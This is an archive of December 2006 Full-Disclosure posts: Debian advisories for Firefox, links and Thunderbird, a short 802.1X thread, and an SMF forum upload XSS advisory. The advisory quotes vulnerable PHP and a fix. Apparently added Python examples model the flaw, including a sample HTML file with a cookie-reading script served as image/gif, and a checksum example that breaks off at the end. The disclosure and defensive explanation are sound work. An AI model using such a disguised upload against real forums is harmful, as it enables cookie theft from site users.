    in the handling of PKCS-1 certificates was incomplete, which allows
    the forgery of certificates.

CVE-2006-5463

    "shutdown" discovered that modification of JavaScript objects
    during execution could lead to the execution of arbitrary
    JavaScript bytecode.

CVE-2006-5464

    Jesse Ruderman and Martijn Wargers discovered several crashes in
    the layout engine, which might also allow execution of arbitrary
    code.

CVE-2006-5748

    Igor Bukanov and Jesse Ruderman discovered several crashes in the
    JavaScript engine, which might allow execution of arbitrary code.

This update also addresses several crashes, which could be triggered
by malicious websites, and fixes a regression introduced in the
previous Mozilla update.

For the stable distribution (sarge) these problems have been fixed in
version 1.0.4-2sarge13.

For the unstable distribution (sid) these problems have been fixed in
the current iceweasel package 2.0+dfsg-1.

We recommend that you upgrade your mozilla-firefox package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.dsc
      Size/MD5 checksum: 1003 4a8d05c1e9563e6066ca838e7c0b2f53
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.diff.gz
      Size/MD5 checksum: 450265 46d4bedf12a1e0c92a275ae012d92b5a
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz
      Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_alpha.deb
      Size/MD5 checksum: 11182242 388bf02a94456182cd7a39187886875a
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_alpha.deb
      Size/MD5 checksum: 170908 4cbff185bb88b1c7e11791059cd83142
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_alpha.deb
      Size/MD5 checksum: 62736 f42571aa18001fc521be0f5348eb9511

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_amd64.deb
      Size/MD5 checksum: 9412474 fcd7ced169a47d7413197a918047036a
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_amd64.deb
      Size/MD5 checksum: 165706 931ebeee155ac01fcecb1467388a2fab
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_amd64.deb
      Size/MD5 checksum: 61276 cf839454fe9e09a0b58641353f9c75c6

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_arm.deb
      Size/MD5 checksum: 8233670 39a042f6300c805ad372828fd115cab0
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_arm.deb
      Size/MD5 checksum: 157176 873eb90c91c98e1c4168f215b493fd74
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_arm.deb
      Size/MD5 checksum: 56586 c53ca4b95b188684381338eae43603cc

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_hppa.deb
      Size/MD5 checksum: 10287242 8a7eddef738dfe4eb164bd5e486474a2
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_hppa.deb
      Size/MD5 checksum: 168624 fa195e512062a19cf92018de4009160d
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_hppa.deb
      Size/MD5 checksum: 61736 b0dbfbbce97f954c9487a126d20b9a90

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_i386.deb
      Size/MD5 checksum: 8908194 9cfe0ac430050c7d62066cd3f8beb64f
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_i386.deb
      Size/MD5 checksum: 160902 77a78dd1eac37417b4a5629e745e4391
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_i386.deb
      Size/MD5 checksum: 58124 f82b3d3fc66e1054d5da72a69ab9bd20

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_ia64.deb
      Size/MD5 checksum: 11646376 83d5349be8156e1f95eb75da89beb578
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_ia64.deb
      Size/MD5 checksum: 171244 46ae3d6d9112d31f92407922832e6599
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_ia64.deb
      Size/MD5 checksum: 65934 690969e2e7a865faee22ed6fb8a88384

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_m68k.deb
      Size/MD5 checksum: 8186050 ab9f31d6cbd9ff6c1820c59ef1e44ce7
http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_m68k.deb Size/MD5 checksum: 159792 69c3cf68fc12fd5fb3929339aa8cd9cb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_m68k.deb Size/MD5 checksum: 57394 14636fe25df3a18c536819129e83e1a0 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_mips.deb Size/MD5 checksum: 9943474 75b7796d42079421a151bfac35a17f95 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_mips.deb Size/MD5 checksum: 158694 a3c6f1c71947cb5e9c2fc8d8acece832 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_mips.deb Size/MD5 checksum: 58386 395683ab3ebb0983e24bc3afde8d28f5 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge12_mipsel.deb Size/MD5 checksum: 9819470 41ecbd5f3543c0b110771e93e2307abc http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge12_mipsel.deb Size/MD5 checksum: 157672 43ca2a353bacf378a2dc7dfa9a7f3a73 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge12_mipsel.deb Size/MD5 checksum: 57634 8d16796108c3a7627ab9654e977277a5 PowerPC architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_powerpc.deb Size/MD5 checksum: 8580222 c2f239d0961911962bea6b7f7bf1cdc1 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_powerpc.deb Size/MD5 checksum: 159320 5a5ea9d8a9f7a845bc1898b0c9976112 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_powerpc.deb Size/MD5 checksum: 60508 3ce3df0f45aeef3acb1964960bf76406 IBM 
S/390 architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_s390.deb Size/MD5 checksum: 9650866 9fd3e3788898152580a0ab344112b5ab http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_s390.deb Size/MD5 checksum: 166290 70bcea0f67fc9d0288c75bb2ad8e7b36 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_s390.deb Size/MD5 checksum: 60696 7d6b7a3cf65fa798f3e41275f4bb9967 Sun Sparc architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_sparc.deb Size/MD5 checksum: 8672090 c32301aeb3eb3ebbad2ff26f56d3e9ee http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_sparc.deb Size/MD5 checksum: 159508 7c3fd5b5a0c78c8abf09082dcb06bbfc http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_sparc.deb Size/MD5 checksum: 56946 0b154ceb732d771ca492e4d98ea21350 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFcvzPW5ql+IAeqTIRAv/HAJwNUC+NOPCf2Nq1161rGipNubPqDQCfWnmg FvfjUK0FBtQjuT9x9Fg3gu8= =1YQv -----END PGP SIGNATURE----- From guillaume.barberot at gmail.com Sat Dec 2 16:55:48 2006 From: guillaume.barberot at gmail.com (Guillaume Barberot) Date: Sat, 2 Dec 2006 17:55:48 +0100 Subject: [Full-disclosure] 802.1X tool? 
In-Reply-To: 
References: <45708D89.2030407@csuohio.edu>
Message-ID: 

Moreover, the Juniper/Funk Odyssey Client can choose to connect only one
network interface if both the LAN and the WLAN interface are connected, by
disconnecting the other one.

2006/12/2, Douglas Haider :
>
> The Funk Odyssey tool is now owned by Juniper. That being said, I have
> used the Odyssey tool and I am impressed with its functionality,
> especially from a risk management / controls perspective.
>
> Respectfully,
> Douglas
>
>
> >From: Michael Holstein
> >To: Full-Disclosure ,Wifisec
> >
> >Subject: Re: [Full-disclosure] 802.1X tool?
> >Date: Fri, 01 Dec 2006 15:16:09 -0500
> >
> >Meetinghouse (AEGIS) or Funk (Odyssey).
> >
> >Note : Meetinghouse is now owned by Cisco.
> >
> >Cheers,
> >
> >~Mike.
> >
> >
> >Ozan Ozkara wrote:
> >>Hi folks,
> >>
> >>I am trying to find a tool which provides automatic client configuration
> >>for an 802.1X implementation in a Windows environment. I'm trying to
> >>implement 802.1X authentication for both wired and wireless connections.
> >>Is there any way to do remote client configuration for the win32
> >>environment? Will I be able to do that?
> >>
> >>I'd appreciate any real world experience on the subject.
> >>
> >>thanks
> >>
> >>
> >>------------------------------------------------------------------------
> >>
> >>_______________________________________________
> >>Full-Disclosure - We believe in it.
> >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061202/a2c2a809/attachment.html

From joey at infodrom.org Sun Dec 3 20:01:26 2006
From: joey at infodrom.org (Martin Schulze)
Date: Sun, 3 Dec 2006 21:01:26 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1225-2] New Mozilla Firefox packages fix several vulnerabilities
Message-ID: <20061203200126.24E5BFDE6@finlandia.home.infodrom.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1225-2                    security at debian.org
http://www.debian.org/security/                             Martin Schulze
December 3rd, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mozilla-firefox
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748
CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496
BugTraq IDs    : 19678 20957

This update covers packages for the little endian MIPS architecture
missing in the original advisory.

Several security related problems have been discovered in Mozilla and
derived products such as Mozilla Firefox. The Common Vulnerabilities and
Exposures project identifies the following vulnerabilities:

CVE-2006-4310

    Tomas Kempinsky discovered that malformed FTP server responses could
    lead to denial of service.

CVE-2006-5462

    Ulrich Kühn discovered that the correction for a cryptographic flaw
    in the handling of PKCS-1 certificates was incomplete, which allows
    the forgery of certificates.

CVE-2006-5463

    "shutdown" discovered that modification of JavaScript objects during
    execution could lead to the execution of arbitrary JavaScript bytecode.

CVE-2006-5464

    Jesse Ruderman and Martijn Wargers discovered several crashes in the
    layout engine, which might also allow execution of arbitrary code.
CVE-2006-5748

    Igor Bukanov and Jesse Ruderman discovered several crashes in the
    JavaScript engine, which might allow execution of arbitrary code.

This update also addresses several crashes which could be triggered by
malicious websites, and fixes a regression introduced in the previous
Mozilla update.

For the stable distribution (sarge) these problems have been fixed in
version 1.0.4-2sarge13.

For the unstable distribution (sid) these problems have been fixed in
the current iceweasel package 2.0+dfsg-1.

We recommend that you upgrade your mozilla-firefox package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.dsc Size/MD5 checksum: 1003 4a8d05c1e9563e6066ca838e7c0b2f53 http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13.diff.gz Size/MD5 checksum: 450265 46d4bedf12a1e0c92a275ae012d92b5a http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d Little endian MIPS architecture: http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge13_mipsel.deb Size/MD5 checksum: 9820186 7823ac933179f566597b7bd4e3810fcb http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge13_mipsel.deb Size/MD5 checksum: 158272 950a04ca3dfd4870b30d5d8c6ae536ee http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge13_mipsel.deb Size/MD5 checksum: 58218 0dad036900c189fc233a5fe25c2edd3a These files will probably be moved into the stable distribution on its next update. 
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFcy0VW5ql+IAeqTIRAgxMAKC0SdOsZeB/nY4PZL+cqJJFJkhPQgCgo2DD
Bl3uw4f40sxNi3ss3FrgBPY=
=OMQR
-----END PGP SIGNATURE-----

From jmm at debian.org Sun Dec 3 20:19:22 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 3 Dec 2006 21:19:22 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1226-1] New links packages fix arbitrary shell command execution
Message-ID: <20061203201922.GA6852@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1226-1                    security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 3rd, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : links
Vulnerability  : insufficient escaping
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-5925
Debian Bug     : 399187

Teemu Salmela discovered that the links character mode web browser
performs insufficient sanitising of smb:// URIs, which might lead to
the execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in
version 0.99+1.00pre12-1sarge1.

For the upcoming stable distribution (etch) this problem has been fixed
in version 0.99+1.00pre12-1.1.

For the unstable distribution (sid) this problem has been fixed in
version 0.99+1.00pre12-1.1.

We recommend that you upgrade your links package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1.dsc Size/MD5 checksum: 628 a1ac1c1549a102a35398b6453df8cf03 http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1.diff.gz Size/MD5 checksum: 8329 5898f75988aba793e9559295996289ef http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12.orig.tar.gz Size/MD5 checksum: 597848 c262b08c822a582bbc992e3730f43336 Architecture independent components: http://security.debian.org/pool/updates/main/l/links/links-ssl_0.99+1.00pre12-1sarge1_all.deb Size/MD5 checksum: 5460 d983ff06f50743eefc590e13b881c649 Alpha architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_alpha.deb Size/MD5 checksum: 441038 6d3f4dbcdb63455d1a7c6c573c0a2cb0 AMD64 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_amd64.deb Size/MD5 checksum: 396200 13443385aff64d07c142561684d3698d ARM architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_arm.deb Size/MD5 checksum: 376692 90dc38882cee571a605ea4c1b312101f HP Precision architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_hppa.deb Size/MD5 checksum: 416286 1a0e7cd0c9885a5a47f89feecdeea13a Intel IA-32 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_i386.deb Size/MD5 checksum: 385186 a99be183941d62c33bd7d0f49c1856cb Intel IA-64 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_ia64.deb Size/MD5 checksum: 
524446 e68877303d408b3b730e703c6d78f709 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_m68k.deb Size/MD5 checksum: 343786 51765dbe4d8788b4f4219c6f71461579 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_mips.deb Size/MD5 checksum: 412208 f3272fc9e06d0ad0bed4c2d2816502fe Little endian MIPS architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_mipsel.deb Size/MD5 checksum: 408254 70f5c450fd225ea6a82befeb3d6aeeab PowerPC architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_powerpc.deb Size/MD5 checksum: 396926 b0cbccacc3632be2d3eb97cea74ea6d8 IBM S/390 architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_s390.deb Size/MD5 checksum: 390546 2def4e695f30d34bb03a0592f5deee5b Sun Sparc architecture: http://security.debian.org/pool/updates/main/l/links/links_0.99+1.00pre12-1sarge1_sparc.deb Size/MD5 checksum: 379836 be1bae25603d4a50cf854a6b6b075960 These files will probably be moved into the stable distribution on its next update. 
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFczECXm3vHE4uyloRAnygAJwJea6TheWExHFK0nH5A5rbWDG3ygCgmbfu
5P76B0rdqS+zzIEMonB9cWU=
=Hj9Z
-----END PGP SIGNATURE-----

From davek_throwaway at hotmail.com Sun Dec 3 20:32:16 2006
From: davek_throwaway at hotmail.com (Dave "No, not that one" Korn)
Date: Sun, 3 Dec 2006 20:32:16 -0000
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
References: <200612011515526141632399@mail.smumn.edu> <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com>
Message-ID: 

TheGesus wrote:
> More and more people are hearing the recommendation to "withdraw a
> little extra cash out of the banks" to prepare for cyber attacks. If
> as many as 1.32% of bank depositors take their advice and withdraw all
> their money, the banks will close their doors.
>
> Al Qaeda threatens to disrupt the electronic bank payments system.

And YOU'RE MAKING IT HAPPEN! DUH!

> This system contributes about 90% of the US money supply. Without it,
> 10% of the money supply (the cash & coin) must take over the work of
> the other 90%.
>
> Conclusion: Withdraw and stockpile some cash now. Shoot for at least
> three months' cash requirements. Don't wait. Start now.

AQ don't intend to "attack the banking system". They plan to get
paranoids, suckers, and conspiracy-theorists like you to do their dirty
work for them. They just need to spread a rumour and then sit back and
watch as all you "loyal patriots" trash your own country out of fear and
cowardice.
ObTopic: Sounds like a social engineering attack to me; attempting to
manipulate the users of a service into acting as an implicit DDoS against
it.

cheers,
DaveK
-- 
Can't think of a witty .sigline today....

From jessicasaulhope at googlemail.com Sun Dec 3 18:16:23 2006
From: jessicasaulhope at googlemail.com (Jessica Hope)
Date: Sun, 3 Dec 2006 18:16:23 +0000
Subject: [Full-disclosure] SMF upload XSS vulnerability
Message-ID: <44740eb60612031016t1f4225aeyc0b861441a64a579@mail.gmail.com>

======================================================================
Advisory     : SMF upload XSS vulnerability
Release Date : December 4th, 2006
Application  : Simple Machines Forum
Version      : SMF 1.1 Final (and earlier versions)
Platform     : PHP
Vendor URL   : http://www.simplemachines.org
Authors      : Jessica Hope ( jessicasaulhope at googlemail.com )
             : rotwang ( c.a.rotwang at googlemail.com )
=======================================================================

Overview

Due to various failures in sanitising user input, it is possible to
construct XSS attacks using files masquerading as images.

=======================================================================

Discussion

An often ignored XSS hazard stems from Internet Explorer's habit of
"guessing" the type of displayed data when the declared MIME type and
the file's actual content do not match. This is especially dangerous in
software that allows image uploads; the accepted counter-measure is to
use getimagesize() to determine the real image type, so that the correct
MIME type is sent.

SMF's implementation of this check is faulty: it can be bypassed simply
by setting the request parameter "image". In that case the file is
delivered with the type "image/gif", regardless of its content or name,
so even an uploaded text file can carry an XSS vector. Neither the
upload function nor the delivery code actually acts upon the file's
content, and the admin option "Check attachment's extension" has no
impact on this behaviour.
Vulnerable code in Display.php, line 1045:

    if (filesize($filename) != 0)
    {
        $size = @getimagesize($filename);
        if (!empty($size) && $size[2] > 0 && $size[2] < 4)
            header('Content-Type: image/' . ($size[2] != 1 ? ($size[2] != 2 ? 'png' : 'jpeg') : 'gif'));
        // Errr, it's an image.... what kind?  A... gif?  Yeah that's it, gif!  Like JIF, the peanut butter.
        elseif (isset($_REQUEST['image']))
            header('Content-Type: image/gif');
    }

The first branch only fires for the getimagesize() type codes 1, 2 and 3
(GIF, JPEG, PNG). For any other file, the presence of the "image" request
parameter alone decides that the response is sent as image/gif.

=======================================================================

Solution

It is possible to work around the issue like so:

    $size = @getimagesize($filename);
    if (!empty($size) && $size[2] > 0 && $size[2] < 4)
    {
        header('Content-Type: image/' . ($size[2] != 1 ? ($size[2] != 2 ? 'png' : 'jpeg') : 'gif'));
    }
    // Errr, it's not an image.... what kind?  Ah, let's play it safe
    else
    {
        header('Content-Disposition: attachment; filename="' . $real_filename . '"');
        header('Content-Type: application/octet-stream');
    }

Moreover, the upload function should check the actual file type. Files
with invalid extensions should not be accepted as uploads. The avatar
function already implements such checks; they should be applied to the
attachment function as well.

=======================================================================

History:

Having dealt with SMF in the past, I know that they do not take security
seriously (have a look at my earlier IP spoofing SMF report). Thus, until
I believe that SMF have shaped up in terms of security, any issues that I
come across I'll be posting as a full disclosure immediately. Incidentally,
the IP spoofing still exists in the latest SMF too. They never learn.
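The delivery check described in the Discussion and Solution sections above, modelled as an added example in Python; this is not the advisory's code and not SMF's own PHP. The function names, the request dictionary standing in for $_REQUEST, and the two sample uploads are constructed for this example; only the decision logic follows what the advisory shows, with one addition: the attachment name is stripped of quote/CR/LF characters before it goes into the Content-Disposition header, since the Solution's snippet concatenates $real_filename into a header unescaped.

```python
# Added example (Python, not SMF's own PHP): a model of the Content-Type
# decision in SMF's attachment download path as the advisory describes it,
# the vulnerable form beside the hardened form. Function names, the request
# dict and the sample uploads below are constructed for this example.


def sniff_image_type(data: bytes):
    """Return 'gif', 'jpeg' or 'png' from the magic bytes, else None.

    Stands in for getimagesize(): SMF only trusts its type codes 1, 2 and 3
    (GIF, JPEG, PNG), so everything else counts as "not an image". Note that
    a header check says nothing about the rest of the file.
    """
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if data[:3] == b"\xff\xd8\xff":
        return "jpeg"
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    return None


def vulnerable_headers(data: bytes, request: dict) -> dict:
    """The flawed Display.php logic: a non-image is still served as image/gif
    whenever the request carries an 'image' parameter."""
    headers = {}
    if len(data) != 0:
        kind = sniff_image_type(data)
        if kind is not None:
            headers["Content-Type"] = "image/" + kind
        elif "image" in request:  # attacker-controlled fallback
            headers["Content-Type"] = "image/gif"
    return headers


def safe_filename(name: str) -> str:
    """Drop the characters that would let an attachment name break out of
    the Content-Disposition header value (double quote, CR, LF)."""
    return "".join(c for c in name if c not in '"\r\n')


def hardened_headers(data: bytes, request: dict, real_filename: str) -> dict:
    """The advisory's fix: the request cannot influence the type, and anything
    that is not a recognised image is sent as an opaque download."""
    kind = sniff_image_type(data) if data else None
    if kind is not None:
        return {"Content-Type": "image/" + kind}
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": 'attachment; filename="%s"' % safe_filename(real_filename),
    }


# Constructed sample uploads: a .txt attachment carrying HTML, and a PNG header.
HTML_AS_TXT = b"<html><body><script>alert(document.cookie)</script></body></html>"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def demo() -> dict:
    """Serve the text upload through both versions with ?image set."""
    req = {"image": ""}
    return {
        "vulnerable": vulnerable_headers(HTML_AS_TXT, req),
        "hardened": hardened_headers(HTML_AS_TXT, req, "notes.txt"),
        "real_png": hardened_headers(PNG_SAMPLE, req, "pic.png"),
    }


if __name__ == "__main__":
    for label, hdrs in demo().items():
        print(label, hdrs)
```

Running it shows the text upload leaving the vulnerable path as image/gif and the hardened path as an application/octet-stream download, while a real PNG is still served inline. Two points the snippet makes visible: the request must never be able to choose the type, and a magic-byte check only inspects the first few bytes, so anything the check does not positively identify should be forced to download rather than rendered.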
04th December 2006: Full disclosure

=======================================================================

Credit

This issue is to be credited to Jessica Hope ( jessicasaulhope at googlemail.com ),
and rotwang ( c.a.rotwang at googlemail.com )

From joey at infodrom.org Mon Dec 4 08:14:59 2006
From: joey at infodrom.org (Martin Schulze)
Date: Mon, 4 Dec 2006 09:14:59 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1227-1] New Mozilla Thunderbird packages fix several vulnerabilities
Message-ID: <20061204081459.59678FDE1@finlandia.home.infodrom.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1227-1                    security at debian.org
http://www.debian.org/security/                             Martin Schulze
December 4th, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mozilla-thunderbird
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs        : CVE-2006-4310 CVE-2006-5462 CVE-2006-5463 CVE-2006-5464 CVE-2006-5748
CERT advisories: VU#335392 VU#390480 VU#495288 VU#714496
BugTraq IDs    : 19678 20957

Several security related problems have been discovered in Mozilla and
derived products such as Mozilla Thunderbird. The Common Vulnerabilities
and Exposures project identifies the following vulnerabilities:

CVE-2006-4310

    Tomas Kempinsky discovered that malformed FTP server responses could
    lead to denial of service.

CVE-2006-5462

    Ulrich Kühn discovered that the correction for a cryptographic flaw
    in the handling of PKCS-1 certificates was incomplete, which allows
    the forgery of certificates.

CVE-2006-5463

    "shutdown" discovered that modification of JavaScript objects during
    execution could lead to the execution of arbitrary JavaScript bytecode.

CVE-2006-5464

    Jesse Ruderman and Martijn Wargers discovered several crashes in the
    layout engine, which might also allow execution of arbitrary code.
CVE-2006-5748

    Igor Bukanov and Jesse Ruderman discovered several crashes in the
    JavaScript engine, which might allow execution of arbitrary code.

This update also addresses several crashes which could be triggered by
malicious websites, and fixes a regression introduced in the previous
Mozilla update.

For the stable distribution (sarge) these problems have been fixed in
version 1.0.4-2sarge13.

For the unstable distribution (sid) these problems have been fixed in
the current icedove package 1.5.0.8.

We recommend that you upgrade your mozilla-thunderbird package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
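The manual "wget url / dpkg -i file.deb" route in the Upgrade Instructions of DSA 1225-1, 1225-2, 1226-1 and this advisory skips the integrity check that apt performs for you, so the step a practitioner wants between wget and dpkg -i is to compare the file against the "Size/MD5 checksum" figures printed in the advisory. The following is an added example and not part of the Debian advisories; it uses only the Python standard library, the script name check_deb.py is hypothetical, and the package name and figures in the usage comment are copied from this advisory's Intel IA-32 entry.

```python
# Added example, not part of the Debian advisories: check a downloaded
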